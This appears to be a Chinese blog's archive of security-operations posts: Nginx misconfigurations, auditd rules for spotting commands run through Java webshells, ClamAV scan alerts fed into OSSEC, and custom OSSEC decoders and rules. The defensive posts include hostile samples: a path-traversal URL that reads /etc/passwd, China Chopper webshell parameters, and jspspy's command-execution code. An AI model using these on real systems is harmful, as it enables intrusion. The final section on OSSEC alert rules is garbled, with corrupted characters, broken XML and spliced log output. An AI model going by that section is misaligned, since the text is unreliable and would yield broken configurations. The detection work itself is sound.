分类目录归档:安全运维

【Nginx】配置安全问题

1、CRLF
需要注意的地方:
a)rewrite, return, add_header, proxy_set_header or proxy_pass中
b)使用了$uri和$document_uri,因为这两个参数会进行URL解码,正确配置应该是$request_uri。

c)变量,例如(?P<myvar>[^.]+).

这里先测试一下$uri
添加一条配置

location /sectest {
  return 302 https://$host$uri;
}

结果如下:

 

修改配置为

location /sectest {
  return 302 https://$host$request_uri;
}

结果如下:

测试一下匹配变量导致的CRLF
添加

    location ~ /v1/((?<action>[^.]*)\.json)?$ {
        add_header X-Action $action;
        return 200 "OK";
    }

结果如下:

应该修改正则为

    location ~ /v1/((?<action>[^.\s]*)\.json)?$ {
        add_header X-Action $action;
        return 200 "OK";
    }

2、HTTP头覆盖
如果location有add_header,那么以location为准。如果location没有add_header,则继承Http和server块的add_header内容。
官方配置例子如下:

server {
  listen 80;
  add_header X-Frame-Options "DENY" always;
  location / {
      return 200 "index";
  }

  location /new-headers {
    # Add special cache control
    add_header Cache-Control "no-cache, no-store, max-age=0, must-revalidate" always;
    add_header Pragma "no-cache" always;

    return 200 "new-headers";
  }
}

如果访问/,响应头中有X-Frame-Options

GET / HTTP/1.0

HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 09 Jan 2017 19:28:33 GMT
Content-Type: application/octet-stream
Content-Length: 5
Connection: close
X-Frame-Options: DENY

index

如果访问/new-headers,响应头中没有X-Frame-Options

GET /new-headers HTTP/1.0


HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 09 Jan 2017 19:29:46 GMT
Content-Type: application/octet-stream
Content-Length: 11
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache

new-headers

 

3、alias导致的任意文件读取
错误配置示例如下:

location /files {
  alias /home/;
}

这里如果访问http://example.com/files/readme.txt,就可以获取/home/readme.txt文件。
如果访问http://example.com/files../etc/passwd就可以读取/etc/passwd

需要注意,这里只能添加一个../,也就是跳到上层的目录,这里我修改nginx的配置如下:

        location /files {
                alias /home/elk/;
        }

修复建议:
location和alias的最后必须都带/或者都不带/

Gixy介绍
开源程序https://github.com/yandex/gixy用来检测Nginx配置中存在的问题
安装使用:

pip install gixy
gixy /etc/nginx/nginx.conf

检查项如下:

[ssrf] Server Side Request Forgery
[http_splitting] HTTP Splitting
[origins] Problems with referrer/origin validation
[add_header_redefinition] Redefining of response headers by "add_header" directive
[host_spoofing] Request's Host header forgery
[valid_referers] none in valid_referers
[add_header_multiline] Multiline response headers

参考文章:
https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html
https://mp.weixin.qq.com/s?__biz=MzIzOTQ5NjUzOQ==&mid=2247483699&idx=1&sn=6f0394df7be9aafd65c12002c2bb4f10&chksm=e9287d07de5ff41165757618d932021e1b8e036fd0c1b8305e38ad693097cf05e37b76928eb5&mpshare=1&scene=23&srcid=0714xbWwfcwuCe7XA9oIQryo#rd

Linux下利用auditd监控JAVA执行命令并通过OSSEC告警

0x01 Auditd服务介绍
auditd服务是Linux自带的审计系统,用来记录审计信息,从安全的角度可以用于对系统安全事件的监控。
auditd服务的配置文件位于/etc/audit/audit.rules,其中每个规则和观察器必须单独在一行中。语法如下:

-a <list>,<action> <options>

<list>配置如下:

task
每个任务的列表。只有当创建任务时才使用。只有在创建时就已知的字段(比如UID)才可以用在这个列表中。
entry
系统调用条目列表。当进入系统调用确定是否应创建审计时使用。
exit
系统调用退出列表。当退出系统调用以确定是否应创建审计时使用。
user
用户消息过滤器列表。内核在将用户空间事件传递给审计守护进程之前使用这个列表过滤用户空间事件。有效的字段只有uid、auid、gid和pid。
exclude
事件类型排除过滤器列表。用于过滤管理员不想看到的事件。用msgtype字段指定您不想记录到日志中的消息。

<action>配置如下:

never
不生成审计记录。
always
分配审计上下文,总是把它填充在系统调用条目中,总是在系统调用退出时写一个审计记录。如果程序使用了这个系统调用,则开始一个审计记录。

<options>配置如下:

-S <syscall>
根据名称或数字指定一个系统。要指定所有系统调用,可使用all作为系统调用名称。
-F <name[=,!=,<,>,<=]value>
指定一个规则字段。如果为一个规则指定了多个字段,则只有所有字段都为真才能启动一个审计记录。每个规则都必须用-F启动,最多可以指定64个规则。
常用的字段如下:
pid
进程ID。
ppid
父进程的进程ID。
uid
用户ID。
gid
组ID。
msgtype
消息类型号。只应用在排除过滤器列表上。
arch
系统调用的处理器体系结构。指定精确的体系结构,比如i686(可以通过uname -m命令检索)或者指定b32来使用32位系统调用表,或指定b64来使用64位系统调用表。
...

 

0x02 编写测试Java命令监控规则
Jboss的启动账户为nobody,添加审计规则

# grep '\-a' /etc/audit/audit.rules 
-a exclude,always -F msgtype=CONFIG_CHANGE
-a exit,always -F arch=b32 -F uid=99 -S execve -k webshell

重启服务

# service auditd restart
Stopping auditd: [ OK ]
Starting auditd: [ OK ]

使用webshell测试:
1)菜刀马测试
菜刀马传递的参数为

tom=M&z0=GB2312&z1=-c/bin/sh&z2=cd /;whoami;echo [S];pwd;echo [E]

所执行的程序如下:

else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);

审计日志如下:

type=EXECVE msg=audit(1500273887.809:7496): argc=3 a0="/bin/sh" a1="-c" a2=6364202F7765622F70726F6A6563742F7A616F6A69617379732E6A69616E73686539392E636F6D2E636563616F707379732F636563616F707379732F3B77686F616D693B6563686F205B535D3B7077643B6563686F205B455D

2)jspspy测试
jspspy传递的参数为

o=shell&type=command&command=netstat+-antlp&submit=Execute

所执行的程序如下:

String type = request.getParameter("type");
if (type.equals("command")) {
ins.get("vs").invoke(request,response,JSession);
out.println("<div style='margin:10px'><hr/>");
out.println("<pre>");
String command = request.getParameter("command");
if (!Util.isEmpty(command)) {
Process pro = Runtime.getRuntime().exec(command);
BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String s = reader.readLine();

审计日志如下:

type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"

 

0x03 OSSEC监控配置
OSSEC本身已经包含了auditd事件的解码规则,例如:

<decoder name="auditd">
  <prematch>^type=</prematch>
</decoder>
.......

但是在RULES里面没有找到现成的规则,编辑local_rules.xml,新增

<group name="syslog,auditd,">
  <rule id="110000" level="0" noalert="1">
    <decoded_as>auditd</decoded_as>
    <description>AUDITD messages grouped.</description>
  </rule>
  <rule id="110001" level="10">
    <if_sid>110000</if_sid>
    <match>EXECVE</match>
    <description>Java execution command</description>
  </rule>
</group>

测试

[root@localhost ossec]# ./bin/ossec-logtest 
2017/07/17 16:28:26 ossec-testrule: INFO: Reading local decoder file.
2017/07/17 16:28:26 ossec-testrule: INFO: Started (pid: 9463).
ossec-testrule: Type one log per line.

type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"


**Phase 1: Completed pre-decoding.
       full event: 'type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"'
       hostname: 'localhost'
       program_name: '(null)'
       log: 'type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"'

**Phase 2: Completed decoding.
       decoder: 'auditd'

**Phase 3: Completed filtering (rules).
       Rule id: '110001'
       Level: '10'
       Description: 'Java execution command'
**Alert to be generated.

然后在Agent端添加监控文件

  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/audit/audit.log</location>
  </localfile>

然后jspspy执行系统命令,可以看到告警如下

[root@localhost ossec]# tail -f /var/ossec/logs/alerts/alerts.log 
** Alert 1500280231.400419: mail  - syslog,auditd,
2017 Jul 17 16:30:31 (agent-31) 10.110.1.31->/var/log/audit/audit.log
Rule: 110001 (level 10) -> 'Java execution command'
type=EXECVE msg=audit(1500280229.507:7665): argc=1 a0="pwd"

这里还需考虑的一个问题是白名单,例如公司的一些站点本身就会调用视频处理的一些功能,也会调用系统命令。所以为了避免误报,需要新增一个白名单功能。
这里我们修改一下local_rules.xml,新增白名单规则,并且放到EXECVE规则上面。

<group name="syslog,auditd,">
  <rule id="110000" level="0" noalert="1">
    <decoded_as>auditd</decoded_as>
    <description>AUDITD messages grouped.</description>
  </rule>
  <rule id="110001" level="0">
    <if_sid>110000</if_sid>
    <regex>whoami|passwd</regex>
    <description>Java execution white list</description>
  </rule>
  <rule id="110002" level="10">
    <if_sid>110000</if_sid>
    <match>EXECVE</match>
    <description>Java execution command</description>
  </rule>
</group>

如上所示,执行whoami和cat /etc/passwd的时候不会产生告警。

 

Linux下部署CLamAV并结合OSSEC告警

[root@server120 local]# yum install gcc openssl openssl-devel pcre pcre-devel clamav clamd -y

安装完成后,需要升级病毒库。
升级程序为/usr/bin/freshclam。
默认的配置文件为/etc/freshclam.conf,内容如下

[root@localhost ossec]# grep -v '^$' /etc/freshclam.conf | grep -v '^#'
/var/lib/clamav #病毒库的位置
UpdateLogFile /var/log/clamav/freshclam.log
LogSyslog yes
DatabaseOwner clam
DatabaseMirror db.local.clamav.net #病毒同步的请求地址
DatabaseMirror db.local.clamav.net #病毒同步的请求地址

这里修改一下配置文件:

[root@localhost ossec]# grep -v '^$' /etc/freshclam.conf | grep -v '^#'
DatabaseDirectory /var/lib/clamav
UpdateLogFile /var/log/clamav/freshclam.log
DatabaseOwner clam
DatabaseMirror db.cn.clamav.net
DatabaseMirror db.local.clamav.net

然后更新一下病毒库

[root@localhost ossec]# /usr/bin/freshclam
[root@localhost clamav]# ll /var/lib/clamav/
total 341836
-rw-r--r-- 1 clam clam 693248 Jul 14 10:20 bytecode.cld
-rw-r--r-- 1 clam clam 41839208 Jul 14 10:20 daily.cvd
-rw-r--r-- 1 clam clam 307499008 Jul 14 10:03 main.cld
-rw------- 1 clam clam 156 Jul 14 10:22 mirrors.dat

其中daily.cld与daily.cvd相同,只不过daily.cvd是个压缩文件,而daily.cld不是。
freshclam会判断自从上一次检测后是否有新的更新,如果有则会下载diff文件,如果下载diff文件,则会下载一个最新的daily.cvd。

Clamav会添加一个每天执行的定时任务/etc/cron.daily/freshclam,每天更新病毒库文件。

LOG_FILE="/tmp/freshclam.log"
if [ ! -f "$LOG_FILE" ]; then
    touch "$LOG_FILE"
    chmod 644 "$LOG_FILE"
    chown clam.clam "$LOG_FILE"
fi

/usr/bin/freshclam \
    --quiet \
    --datadir="/var/lib/clamav" \
    --log="$LOG_FILE"

 

病毒库更新完成后,执行扫描任务。
这里的想法是OSSEC本身已经有了clamav扫描结果的解码和rule文件
etc/decoder.xml如下:

<decoder name="clamd">
  <program_name>^clamd</program_name>
</decoder>

<decoder name="freshclam">
  <program_name>^freshclam</program_name>
</decoder>

rules/clam_av_rules.xml如下:

  <rule id="52502" level="8">
    <if_sid>52500</if_sid>
    <match>FOUND</match>
    <description>Virus detected</description>
    <group>virus</group>
  </rule>

通过decoder可以看到这里匹配的是Syslog头中的程序为clamd,也就是必须是syslog格式才能解析告警,而默认的-l参数输出非syslog格式,如下测试:
test目录下包含了一些测试的样本文件,我拷贝之前应急拿的一个文件放到了/tmp下

[root@localhost ossec]# /usr/bin/clamscan -i -r /tmp/ -l /var/log/clamav.log
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6300501
Engine version: 0.99.2
Scanned directories: 221
Scanned files: 95
Infected files: 1
Data scanned: 2.79 MB
Data read: 2.62 MB (ratio 1.06:1)
Time: 11.918 sec (0 m 11 s)

查看/var/log/clamav.log,可以看到非Syslog格式

[root@localhost ossec]# cat /var/log/clamav.log

-------------------------------------------------------------------------------

/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6300501
Engine version: 0.99.2
Scanned directories: 221
Scanned files: 95
Infected files: 1
Data scanned: 2.79 MB
Data read: 2.62 MB (ratio 1.06:1)
Time: 11.918 sec (0 m 11 s)

通过查看/etc/clamd.conf可以看到里面有参数LogSyslog

[root@localhost ossec]# cat /etc/clamd.conf | grep LogSys
LogSyslog yes

可以配置开启syslog,默认输出到local6,但是测试发现这个配置文件不是默认加载的,写进去的配置无法生效,所以这里用logger来输出syslog。
修改一下rsyslog的配置

*.info;mail.none;authpriv.none;cron.none;local6.none /var/log/messages #添加local6.none
local6.notice /var/log/clamav.log

[root@localhost ossec]# service rsyslog restart
[root@localhost ossec]# /usr/bin/clamscan --infected -r /tmp -i | logger -it clamd -p local6.notice
[root@localhost ossec]# cat /var/log/clamav.log 
Jul 14 11:22:45 localhost clamd[1723]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
Jul 14 11:22:45 localhost clamd[1723]: 
Jul 14 11:22:45 localhost clamd[1723]: ----------- SCAN SUMMARY -----------
Jul 14 11:22:45 localhost clamd[1723]: Known viruses: 6300501
Jul 14 11:22:45 localhost clamd[1723]: Engine version: 0.99.2
Jul 14 11:22:45 localhost clamd[1723]: Scanned directories: 221
Jul 14 11:22:45 localhost clamd[1723]: Scanned files: 95
Jul 14 11:22:45 localhost clamd[1723]: Infected files: 1
Jul 14 11:22:45 localhost clamd[1723]: Data scanned: 2.79 MB
Jul 14 11:22:45 localhost clamd[1723]: Data read: 2.62 MB (ratio 1.06:1)
Jul 14 11:22:45 localhost clamd[1723]: Time: 11.950 sec (0 m 11 s)

这里我们用OSSEC监控一下这个文件,添加配置

  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/clamav.log</location>
  </localfile>

[root@localhost ossec]# /var/ossec/bin/ossec-control restart

可以看到产生的告警如下:

[root@localhost ossec]# tail -n 5 /var/ossec/logs/alerts/alerts.log 
** Alert 1500002954.2336: mail - clamd,freshclam,virus
2017 Jul 14 11:29:14 (192.168.192.1953) any->/var/log/clamav.log
Rule: 52502 (level 8) -> 'Virus detected'
Jul 14 11:29:14 localhost clamd[2077]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

这里另外需要考虑四个问题
1)如何添加病毒库白名单
在病毒库所在目录创建文件:whitelist-signatures.ign2
以脏牛为例,添加内容:Unix.Exploit.CVE_2016_5195-2

2)文件软链问题,是否会重复扫描。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -h
--follow-dir-symlinks[=0/1(*)/2] Follow directory symlinks (0 = never, 1 = direct, 2 = always)
--follow-file-symlinks[=0/1(*)/2] Follow file symlinks (0 = never, 1 = direct, 2 = always)

0表示不检测软链;1表示需要向clamscan传递参数指定文件;2表示检测软链。默认值为1。
这里创建软链测试一下

[root@server120 tmp]# ln -s /tmp/makeudp /tmp/makeudp1 

当指定follow-file-symlinks=0时,软链文件没有扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=0 -r /tmp 
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

当指定follow-file-symlinks=1时,不传递参数,软链文件没有扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=1 -r /tmp 
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

当指定follow-file-symlinks=1时,传递参数/tmp/makeudp,软链文件可以扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=1 -r /tmp /tmp/makeudp
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

当指定follow-file-symlinks=2时,软链文件可以扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=2 -r /tmp 
/tmp/makeudp1: Unix.Trojan.Agent-37008 FOUND
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

所以默认就不会扫描软链文件。
3)很多机器都挂载了存储,需要排除存储目录。
可以通过–exclude-dir=”^/sys”来排除掉。
10和192开头的挂载排除掉,如下所示:

df -h | egrep '(^10\.|^192\.)' | awk '{print $6}' | sed 's/^/^/' | xargs | sed 's/ /|/g'

4)因为是定时任务每天凌晨执行,如果扫描到了存储设备,很有可能一天扫描不完,需要做判断,如果扫描任务还存在则不扫描;另外针对这种扫描时间超长的事件也需要告警出来,所以需要新增ossec的检测规则扫描时间超过6小时告警。
rules/clam_av_rules.xml新增:

  <rule id="52510" level="7">
      <if_sid>52500</if_sid>
      <match>Time: </match>      
      <regex>\(\d\d\d\d |\(4\d\d |\(5\d\d |\(6\d\d |\(7\d\d |\(8\d\d |\(9\d\d |\(36\d |\(37\d |\(38\d |\(39\d </regex>
      <description>ClamAV scan time over 6hours</description>
  </rule>

PS:这里的正则写成\d{4}不行,[1-9]也不行,无法匹配到
然后测试一下OSSEC告警:

Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)


**Phase 1: Completed pre-decoding.
       full event: 'Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)'
       hostname: 'localhost'
       program_name: 'clamd'
       log: 'Time: 11.888 sec (360 m 11 s)'

**Phase 2: Completed decoding.
       decoder: 'clamd'

**Phase 3: Completed filtering (rules).
       Rule id: '52510'
       Level: '7'
       Description: 'ClamAV scan time over 6hours'
**Alert to be generated.

 

最终执行的定时任务脚本如下:

#!/bin/bash

WHITEDIR="^/proc/|^/sys/|^/data|^/test|/upload"
ps axu | grep clamscan | grep -v grep > /dev/null
if [[ $? == 0 ]]; then
       exit
fi
NFSDIR=`df -h | egrep '(^10\.|^192\.)' | awk '{print $6}' | sed 's/^/^/' | xargs | sed 's/ /|/g'`

if [[ -n $NFS ]]; then
        WHITEDIR="${WHITEDIR}|${NFSDIR}"
fi
COMMAND="/usr/bin/clamscan  -i --exclude-dir='${WHITEDIR}' -r / | logger -it clamd  -p local6.notice"

if [ -f "/usr/bin/clamscan" ];then
        eval $COMMAND &
fi

 

【OSSEC】日志泛化及告警规则配置

OSSEC是一款开源的多平台的入侵检测系统,可以运行于Windows, Linux, OpenBSD/FreeBSD, 以及 MacOS等操作系统中。包括了日志分析,全面检测,root-kit检测。

1. 测试和验证OSSEC泛化及告警规则

OSSEC默认具有一个ossec-logtest工具用于测试OSSEC的泛化及告警规则。该工具一般默认安装于目录 /var/ossec/bin 中。

使用示例:

 

/var/ossec/bin/ossec-logtest
2014/06/1113:15:36 ossec-testrule: INFO: Reading local decoder file.
2014/06/11 13:15:36 ossec-testrule: INFO: Started (pid: 26740).
ossec-testrule: Type one log per line.
Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2

**Phase 1: Completed pre-decoding.
full event: 'Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2'
hostname: '172.16.25.122/172.16.24.32'
program_name: 'sshd'
log: 'Accepted publickey for root from 172.16.24.121 port 38720 ssh2'

**Phase 2: Completed decoding.
decoder: 'sshd'
dstuser: 'root'
srcip: '172.16.24.121'

**Phase 3: Completed filtering (rules).
Rule id: '10100'
Level: '4'
Description: 'First time user logged in.'
**Alert to be generated.

如上文所示,当输入日志内容:

Jun 1021:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for rootfrom 172.16.24.121 port 38720 ssh2

该条日志经过三步处理,生成了一条4级告警,规则ID为10100,内容为“First time user logged in.”

使用ossec-logtest-v命令,可获取更详细的日志分析逻辑。

/var/ossec/bin/ossec-logtest -v
2014/06/11 13:44:52 ossec-testrule: INFO: Reading local decoder file.
2014/06/11 13:44:52 ossec-testrule: INFO: Started (pid: 27091).
ossec-testrule: Type one log per line.

Jun 11 21:44:41 172.16.25.122/172.16.24.32 sshd[27743]: Did not receive identification string from 172.16.24.121

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 21:44:41 172.16.25.122/172.16.24.32 sshd[27743]: Did not receive identification string from 172.16.24.121'
hostname: '172.16.25.122/172.16.24.32'
program_name: 'sshd'
log: 'Did not receive identification string from 172.16.24.121'

**Phase 2: Completed decoding.
decoder: 'sshd'
srcip: '172.16.24.121'

**Rule debugging:
Trying rule: 1 - Generic template for all syslog rules.
*Rule 1 matched.
*Trying child rules.
Trying rule: 5500 - Grouping of the pam_unix rules.
Trying rule: 5700 - SSHD messages grouped.
*Rule 5700 matched.
*Trying child rules.
Trying rule: 5709 - Useless SSHD message without an user/ip and context.
Trying rule: 5711 - Useless/Duplicated SSHD message without a user/ip.
Trying rule: 5721 - System disconnected from sshd.
Trying rule: 5722 - ssh connection closed.
Trying rule: 5723 - SSHD key error.
Trying rule: 5724 - SSHD key error.
Trying rule: 5725 - Host ungracefully disconnected.
Trying rule: 5727 - Attempt to start sshd when something already bound to the port.
Trying rule: 5729 - Debug message.
Trying rule: 5732 - Possible port forwarding failure.
Trying rule: 5733 - User entered incorrect password.
Trying rule: 5734 - sshd could not load one or more host keys.
Trying rule: 5735 - Failed write due to one host disappearing.
Trying rule: 5736 - Connection reset or aborted.
Trying rule: 5707 - OpenSSH challenge-response exploit.
Trying rule: 5701 - Possible attack on the ssh server (or version gathering).
Trying rule: 5706 - SSH insecure connection attempt (scan).
*Rule 5706 matched.

**Phase 3: Completed filtering (rules).
Rule id: '5706'
Level: '6'
Description: 'SSH insecure connection attempt (scan).'
**Alert to be generated.

2. 自定义日志泛化规则
2.1 添加日志源

添加日志源的方式很简单,通过修改/var/ossec/etc/ossec.conf 即可实现。

如果日志源是本地文件,可通过添加如下配置实现。

<localfile>
  <log_format>syslog</log_format>
  <location>/path/to/log/file</location>
</localfile>

如果日志源是远程syslog,可通过添加如下配置实现。

<remote>
<connection>syslog</connection>
<protocol>udp</protocol>
<port>2514</port>
<allowed-ips>172.16.24.0/24</allowed-ips>
</remote>

2.2 创建自定义的日志泛化规则

假如有两条日志如下文:

Jun 11 22:06:30172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat loginSUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:06:30172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERRORfrom 172.17.153.36 to 172.17.153.38 distport 3333 .

该日志使用ossec-logtest分析之后结果如下:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .



**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.16.25.130/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
No decoder matched.

由此可知OSSEC在分析日志的时候,经过了两个泛化过程:pre-decoding和 decoding。

pre-decoding过程是ossec内置的,只要是标准的syslog日志,都可以解析出如下4个基本信息。

Timestamp:Jun 11 22:06:30

Hostname: 172.17.153.38/172.16.24.32

Programe_name: /usr/bin/auditServerd

Log: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333.

在decoding过程,用户可以通过修改/var/ossec/etc/decoder.xml,实现自定义的泛化。例如在该文件中添加如下规则:

<decoder name="auditServerd">
  <program_name>/usr/bin/auditServerd</program_name>
</decoder>

再次执行/var/ossec/bin/ossec-logtest

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
decoder: 'auditServerd'

发现,该条日志成功命中了名为auditServerd的规则,该条规则可以准确的将日志定位为是程序auditServerd所发出的。

除此之外,基于auditServerd这条规则,我们还可以添加更多的子规则,来识别出更多的信息。如:

<decoder name="auditServerd">                               
  <program_name>/usr/bin/auditServerd</program_name>                        
</decoder>                                                                                                                                                                                                                                       
<decoder name="auditServerd-login">                                      
  <parent>auditServerd</parent>                           
  <regex offset="after_parent">^User (\S+) login (\S+) from (\S+) to (\S+) distport (\S+) \.$</regex>  
  <order>user,status,srcip,dstip,dstport</order>                                
</decoder>

再次执行/var/ossec/bin/ossec-logtest,可获取更多的信息,如下:

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32/usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38distport 3333 .'

**Phase 2: Completed decoding.
decoder: 'auditServerd'
dstuser: 'blackrat'
status:'SUCEESS'
srcip: '172.17.153.36'
dstip: '172.17.153.

用户通过配置上述正则表达式,获取特定字段,用于后续的关联分析。OSSEC一共内置了14个用户可解析的字段:

   - location - where the log came from (only on FTS)

   - srcuser  - extracts the source username

   - dstuser  - extracts the destination (target) username

   - user     - an alias to dstuser (only one of the two can be used)

   - srcip    - source ip

   - dstip    - dst ip

   - srcport  - source port

   - dstport  - destination port

   - protocol - protocol

   - id       - event id 

   - url      - url of the event

   - action   - event action (deny, drop, accept, etc)

   - status   - event status (success, failure, etc)

   - extra_data     - Any extra data

3. 自定义日志告警规则

3.1 规则文件路径配置

OSSEC的规则配置文件默认路径为/var/ossec/rules/,要加载规则文件,需要在/var/ossec/etc/ossec.conf 中配置,默认的配置如下:

 <ossec_config>  <!-- rules global entry -->
  <rules>
    <include>rules_config.xml</include>
    <include>pam_rules.xml</include>
    <include>sshd_rules.xml</include>
    <include>telnetd_rules.xml</include>
    <include>syslog_rules.xml</include>
    <include>arpwatch_rules.xml</include>                                                                                                                                                                                                     
     ......                                                                                                                                                                                     
    <include>clam_av_rules.xml</include>                                                                                                                                                                                                      
    <include>bro-ids_rules.xml</include>                                                                                                                                                                                                      
    <include>dropbear_rules.xml</include>                                                                                                                                                                                                     
    <include>local_rules.xml</include>                                                                                                                                                                                                        
</rules>                                                                                                                                                                                                                                      
</ossec_config>  <!-- rules global entry -->

其实通过下列配置,可以实现加载/var/ossec/rules 下的所有规则文件:

<ossec_config>
    <rules>
        <rule_dir pattern=".xml$">rules</rule_dir>
    </rules>
</ossec_config>

于泛化规则,也可以通过配置decoder_dir域来实现,如:

<ossec_config>
    <rules>
        <decoder_dir pattern=".xml$">rules/plugins/decoders</decoder_dir>
    </rules>
</ossec_config>

上述配置可将/var/ossec/rules/plugins/plugins/decoders目录下所有的xml文件都添加为OSSEC日志泛化规则。

对于更详细的配置及语法,可参考下列文档:

http://ossec-docs.readthedocs.org/en/latest/syntax/head_ossec_config.rules.html#element-rule_dir

 

3.2 OSSEC告警规则配置

例如,我们需要增加对程序auditServerd的告警规则,我们需要针对auditServerd程序新建一个规则文件,对于OSSEC中已经存在的规则文件如rmav/" r7e> <-7i14/06a typrint">*对W9userJ" re加进仚
除此书先typrin个br /> e除此sec/rules/pluginsrverd程序xml</in>添加日志漚

Jun 10s="prettyprint"><group name="syslog,rverd程序 <rulle id="52510" 8evel="0" noalert="1"> <decoded_as>auditd</d</parent&_as> <description>AUDITD g of the sysnt lt;/d</pa Tryinscription> </rule> </gr;rule id="110002"8evel="10"> <if_sid>110000&8;/if_sid> <match&gnly -ids_' stat_sid&nly -idslt;match&g - s.16.24.0/6' dsti_sid& - s.16.lt;description>AUDITD ackrat login Sisad on-ips>SUCEESS2.17.153.36 to 172!scription> </rule> </group>

如上慍置帊面。ID为10id 8;/if 续皯化进伌袻妯链有两板用os孇ᅲ刄则tServerd的规则,都可以凯使用o袻tServerd的规递状态机妯鿗1.>该条为108evel斿储讉两nly tSet login - s0,53.36 to 172.准名且放嚄。<“ackrat login Sisad on-ips>SUCEESS2.17.153.36 to 172!”规则

对于曰中添帺/var漅,可sec/etc/ossec.conf 中配re class="prettyprint"> - loca…;/rlude>dropbear_rules.xml</include> <lude>local_rules.xml</include> ltlude>local_rrverd程序xml</include> &;/rules> </ossec_config>

上述var/ossec/bin/ossec-logtest,可获如下:

Jun 11  1: Completed pre-decoding.
       full event: 'Jul 14 11:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostnamfull eve: '172.17.153.38/172.16.24.32'
programfull ev_name: '/usr/bin/auditServerd'
log: 'Ufull evser blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
decoderfull ev: 'auditServerd'
dstuserfull ev: 'blackrat'
status:full ev'SUCEES S'
srcip: full ev'172.17.153.36'
dstip: full ev: '2.17.153.36'
dst8p: full ev: '33 .17.

Phase 3: Completed filtering (rules).
       Rule id: '52510'
8       Level: '10'
       Description: 'Java exackrat login Sisad on-ips>SUCEESS2.17.153.36 to 172!ert to be generated.

2. 自 17 析。OSSE则

OSSEC默认实现加载/vditSe因%系、需频次分析。OSSE规则I黽载/简博

对于曉两yprin对载/v凇递IP丯解登陆rverd' dstuI1O钟<莈5次斤败链斿伌规则Ityprint"置开启s以凚

<decoderame="syslog,rverd程序
  <rulle id="52510" 8evel="0" noalert="1">
    <decoded_as>auditd</d</parent&_as>
    <description>AUDITD g of the  sysnt
lt;/d</pa
Tryinscription>
  </rule>
</gr;rule id="110002"8evel="10">
    <if_sid>110000&8;/if_sid>
    <match>      
'
srcitch>      
lt;match&gnly -ids_'
stat_sid&nly -idslt;match&g  - s.16.24.0/6'
dsti_sid&  - s.16.lt;description>AUDITD ackrat login Sisad on-ips>SUCEESS2.17.153.36 to 172!scription>
  </rule>
</gr;rule id="110002"8evel="10">
    <if_sid>110000&8;/if_sid>
    <match>      
ORfrom 17tch>      
lt;match>
